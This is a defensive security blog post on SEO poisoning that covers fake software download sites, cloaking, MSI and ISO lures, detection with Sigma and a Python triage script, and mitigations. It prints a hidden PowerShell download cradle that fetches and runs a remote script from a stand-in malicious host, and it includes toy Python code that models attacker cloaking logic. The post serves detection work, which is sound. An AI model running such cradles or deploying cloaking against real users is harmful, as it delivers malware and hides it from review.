SEO Poisoning Attacks: When Google Becomes the Attack Vector
- Akshay Jain
- Apr 7
- 4 min read
Imagine you’re downloading Zoom or Slack: you google "Zoom download", click the first result (because who doesn’t?), and… BAM! You’ve just handed your system to an attacker. Welcome to the dark side of SEO: search engine optimization poisoning.
Modern threat actors are leveraging search engines, the very thing we trust, to compromise systems. In this blog, we explore how SEO poisoning is used for initial access, how to detect it, and what defenders can do to build resilient detection strategies.
What is SEO Poisoning?
SEO poisoning is when attackers create malicious websites and use search engine optimization (SEO) techniques to rank them high in search results for popular queries. These sites usually mimic a legitimate vendor page and are designed to lure users into downloading malware, handing over credentials, or executing scripts.
Common Lures:
Fake software installers (Zoom, Slack, ChatGPT)
Clone login pages
Malicious PDFs with embedded links

Real-World Examples
Batloader Campaign (2022–2023)
Attackers created SEO-optimized fake websites mimicking Zoom, Visual Studio Code, and other legitimate software.
When users searched for "Download Zoom", the top links were poisoned, leading to a fake installer that started the infection.
Users downloaded .msi or .iso files.
These dropped BATLOADER, a loader used for initial access.
Follow-up payloads: Cobalt Strike, the Atera remote-management agent, or remote access trojans.
Sample execution chain (a hidden PowerShell download cradle launched by the installer; the script is fetched and run in memory, so nothing is written to disk):
powershell -WindowStyle hidden -ExecutionPolicy Bypass -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('hxxps://malicious-site[.]com/update.ps1')"
Technical Breakdown: How SEO Poisoning Works
SEO poisoning attacks are not just about throwing up a fake website, they're a calculated abuse of how search engines rank and present content. Let’s dig into the core technical mechanisms behind these attacks:
Step-by-Step Technical Workflow of an SEO Poisoning Campaign
Domain Registration and Hosting
Threat actors register domains that resemble legitimate software vendors (e.g., zoom-downloads[.]xyz, slack-app[.]site).
Hosting is often done on compromised servers or cheap VPS instances, sometimes fronted by Cloudflare (which hides the origin IP) or placed on bulletproof hosting to frustrate takedown.
Search Engine Optimization Tactics
Keyword Stuffing: Attackers inject popular keywords like "free download", "official", "latest version" into HTML metadata, headings, and body.
Backlink Generation: Threat actors create or compromise blogs/forums to post backlinks to their malicious site to increase Google/Bing ranking.
Cloaking: The site displays benign content to search engine crawlers but serves the malware download page to real users. The decision is commonly made on the User-Agent (crawler vs. browser) and on the Referer header (only visitors arriving from a search result get the lure), which is also why an analyst who pastes the URL directly into a browser often sees nothing suspicious.
Malware Delivery Methods
MSI Installers: Custom Windows Installer packages whose custom actions download and execute additional payloads using powershell.exe, curl, or bitsadmin.
ISO Archives or LNK Files: In some campaigns the installer is wrapped in an ISO image. Files extracted from a mounted ISO did not inherit the Mark-of-the-Web until Microsoft fixed MOTW propagation in late 2022, so SmartScreen and Defender reputation checks were skipped; an LNK inside the image gives the user a double-clickable "installer" that actually runs a script.
Signed EXEs: Occasionally, attackers use code-signed executables (stolen or cheaply obtained certificates) to avoid detection and build trust.
Execution: The user runs the installer believing it is legitimate software.
Command & Control: Malware establishes C2 for further exploitation.
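The cloaking step above is worth seeing in code, both from the attacker's side and from the analyst's. The following is an added example, not code from the original post or from any real campaign: serve() models the server-side decision (crawlers and direct visitors get a decoy page, only a browser arriving from a search-engine referrer gets the download lure), and check_cloaking() is the defender's counter-check, which fetches the same URL under several client profiles and compares the responses. The domains, page bodies, crawler User-Agent markers and the injected fetch function are all constructed for the example so that it runs offline.

```python
"""Toy model of search-engine cloaking and the analyst check that exposes it.

Added example: the hostnames, page bodies and the `fetch` callable are
constructed for illustration; swap `fetch` for a real HTTP client to test a
suspicious URL.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict

# Crawler detection by User-Agent substring and search-engine referrer check,
# as described in the cloaking step above (constructed, not an exhaustive list).
CRAWLER_UA_MARKERS = ("googlebot", "bingbot", "duckduckbot")
SEARCH_REFERRERS = ("google.", "bing.", "duckduckgo.")

BENIGN_PAGE = "<h1>Zoom Download</h1><p>Zoom is a video conferencing tool.</p>"
LURE_PAGE = ('<h1>Zoom Download</h1>'
             '<a href="/ZoomInstaller.msi">Download latest version (official)</a>')


@dataclass
class Request:
    user_agent: str
    referer: str = ""


def serve(req: Request) -> str:
    """Attacker-side cloaking: decide which page this visitor receives."""
    ua = req.user_agent.lower()
    if any(marker in ua for marker in CRAWLER_UA_MARKERS):
        return BENIGN_PAGE   # keep the indexed copy clean
    if not any(se in req.referer.lower() for se in SEARCH_REFERRERS):
        return BENIGN_PAGE   # direct visits (analysts, scanners) get the decoy too
    return LURE_PAGE         # a real user who clicked a search result


def find_download_links(html: str):
    """Pull installer-style links out of a page body."""
    return re.findall(r'href="([^"]+\.(?:msi|iso|exe|zip))"', html, re.IGNORECASE)


def check_cloaking(url: str, fetch: Callable[[str, Request], str]) -> Dict:
    """Defender-side check: request the same URL under different client
    profiles and report whether the responses diverge."""
    browser_ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/123.0"
    profiles = {
        "crawler": Request("Mozilla/5.0 (compatible; Googlebot/2.1)"),
        "direct_browser": Request(browser_ua),
        "search_referred": Request(browser_ua, referer="https://www.google.com/"),
    }
    bodies = {name: fetch(url, req) for name, req in profiles.items()}
    return {
        "cloaked": len(set(bodies.values())) > 1,
        "bodies": bodies,
        "lure_links": find_download_links(bodies["search_referred"]),
    }


def demo() -> Dict:
    """Run the check against the toy cloaking server and against an honest one."""
    return {
        # constructed poisoned domain: the fetcher just routes into serve()
        "poisoned": check_cloaking("https://zoom-downloads.xyz/",
                                   lambda url, req: serve(req)),
        # constructed honest site: same page for everyone
        "honest": check_cloaking("https://vendor.example/",
                                 lambda url, req: BENIGN_PAGE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "cloaked=%s" % result["cloaked"], result["lure_links"])
```

Two practitioner notes on the check: real cloaking often also compares the client IP against published crawler ranges or datacenter ASNs, so fetch from an egress that looks like a home user rather than from a cloud sandbox; and record all three bodies, because the "search_referred" copy is the one that carries the installer link your EDR and proxy logs will later show.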
Detection Engineering Considerations
Behavioral Detection:
Detect browser processes (chrome.exe, msedge.exe, firefox.exe) spawning powershell.exe, cmd.exe, or any unsigned .exe. One caveat for installer-based lures: a user who double-clicks a downloaded MSI produces an explorer.exe → msiexec.exe → powershell.exe chain, not a browser parent, so also alert on msiexec.exe spawning script interpreters.
Look for MSI installers or ISOs downloaded from newly registered or untrusted domains. Chromium-based browsers record the download's HostUrl and ReferrerUrl in the file's Zone.Identifier alternate data stream, which you can correlate with proxy logs.
Hunting Queries (Sigma Style):
A sample Sigma rule for this detection (you will likely need to adapt field names and tune it for your environment):
title: Browser Spawning PowerShell
id: a11b60f6-c718-4c25-b12a-1e68bad8101c   # optional, but recommended for tracking
status: experimental   # stable, test, experimental, or deprecated
description: Detects a web browser spawning PowerShell, which can indicate a drive-by or SEO-poisoning payload being launched straight from the browser.
author: your_name_or_team
date: 2025-04-07
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
falsepositives:
  - Browser extensions or enterprise tooling that legitimately launch PowerShell (rare; tune per environment)
level: high
tags:
  - attack.execution
  - attack.t1059.001   # PowerShell
Threat Intel Indicators:
Cheap TLDs such as .xyz, .top, or .click (a weak signal on its own; combine it with the others)
WHOIS or RDAP data showing the domain was registered within the last 30 days
Traffic from search-engine referrals leading straight to an executable, MSI, or ISO download
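To show how the behavioral rule, the msiexec caveat, and the threat-intel indicators above combine, here is an added example (not from the original post) that runs that logic over a handful of constructed process-creation events shaped like Sysmon Event ID 1 records (Image, ParentImage, CommandLine). The hostnames, file paths, command lines and the WHOIS-style registration dates are all invented for the example; the generalization beyond the Sigma rule is that it also flags msiexec.exe as a parent and extracts any URL from the command line to score the domain's TLD and age.

```python
"""Behavioral + threat-intel triage over constructed process-creation events.

Added example: EVENTS and WHOIS are made up; field names follow Sysmon Event 1.
"""
import re
from datetime import date

TODAY = date(2025, 4, 7)   # fixed reference date so the example is reproducible

SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\wscript.exe", "\\mshta.exe")
BROWSERS = ("\\chrome.exe", "\\msedge.exe", "\\firefox.exe")
INSTALLERS = ("\\msiexec.exe",)
SUSPICIOUS_TLDS = (".xyz", ".top", ".click", ".site")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "iex ", "iex(")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

# Constructed events: 0 = browser-launched cradle, 1 = MSI custom action cradle,
# 2 = user opening the MSI, 3 = benign msiexec repair, 4 = benign admin script.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -WindowStyle hidden -ExecutionPolicy Bypass -NoProfile "
                    "-Command \"IEX (New-Object Net.WebClient).DownloadString("
                    "'https://zoom-downloads.xyz/update.ps1')\""},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://slack-app.site/upd.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\ZoomInstaller.msi"'},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /V"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# Constructed WHOIS-style registration dates used for enrichment.
WHOIS = {
    "zoom-downloads.xyz": date(2025, 3, 20),
    "slack-app.site": date(2025, 4, 1),
    "vendor.example": date(2012, 1, 1),
}


def _ends_with_any(path: str, suffixes) -> bool:
    return path.lower().endswith(tuple(s.lower() for s in suffixes))


def domain_risk(host: str, today: date = TODAY, whois=WHOIS):
    """Threat-intel style scoring of a domain: cheap TLD and registration age."""
    reasons = []
    host = host.lower()
    if host.endswith(SUSPICIOUS_TLDS):
        reasons.append("suspicious_tld")
    registered = whois.get(host)
    if registered is None:
        reasons.append("no_whois_record")
    elif (today - registered).days <= 30:
        reasons.append("registered_within_30d")
    return reasons


def evaluate(event: dict, today: date = TODAY):
    """Return the list of detections that fire for one process-creation event."""
    hits = []
    image, parent, cmd = event["Image"], event["ParentImage"], event["CommandLine"]
    if _ends_with_any(image, SCRIPT_HOSTS):
        if _ends_with_any(parent, BROWSERS):
            hits.append("browser_spawns_script_host")     # the Sigma rule above
        if _ends_with_any(parent, INSTALLERS):
            hits.append("msiexec_spawns_script_host")     # the MSI-lure caveat
        if any(m in cmd.lower() for m in CRADLE_MARKERS):
            hits.append("download_cradle")
    for host in URL_RE.findall(cmd):                      # enrich any URL seen
        hits.extend(f"{reason}:{host}" for reason in domain_risk(host, today))
    return hits


def triage(events=EVENTS, today: date = TODAY):
    """(index, detections) for every event that fired at least one detection."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev, today))]


if __name__ == "__main__":
    for idx, hits in triage():
        print(idx, hits)
```

Event 2 (explorer.exe launching msiexec.exe on a file in Downloads) fires nothing on its own, which is the point: it only becomes interesting when correlated with the child it produces (event 1) or with the download's referrer and domain age, so the process-tree link and the web/DNS enrichment are what turn a quiet installer launch into an alert.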
Sandbox Analysis:
Use VMRay, Any.Run, Joe Sandbox, or Cuckoo to observe dropped payloads and outbound connections.
Check for child process behavior: rundll32.exe, cmd.exe, powershell.exe, and so on.
YARA Rules
Create custom YARA signatures for artifacts used in malware disguised as installers (string patterns, PE characteristics such as unusual sections or embedded scripts in MSI tables).
Mitigations & Recommendations
DNS Filtering: Block newly registered domains at the resolver and, where business impact allows, rarely used TLDs such as .xyz, .click, and .top.
User Awareness: Train users to download software only from the vendor's own site or an approved internal repository, and to treat a sponsored or top-ranked "download" result with suspicion.
EDR Monitoring: Enable file reputation checks and PowerShell Script Block Logging (Event ID 4104), so the decoded contents of a download cradle are recorded even when it runs in memory.
Threat Intelligence Integration: Leverage TI feeds to enrich SIEM alerts with known poisoned domains.
SEO poisoning isn’t just an annoyance; it’s a growing initial access vector. Detection involves cross-log correlation: web proxy logs, DNS, process creation, and file downloads. Prevention is hard because the lure arrives through a trusted channel, so early-stage detection and user behavior monitoring are key.
By understanding the depth and breadth of SEO poisoning attacks, defenders can move beyond signature-based detection and embrace behavioral-based hunting. This also equips SOC teams to build proactive detections that trigger before the malware fully executes, targeting the early stages of the kill chain.
Happy cyber-exploration! 🚀🔒
Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!
-AJ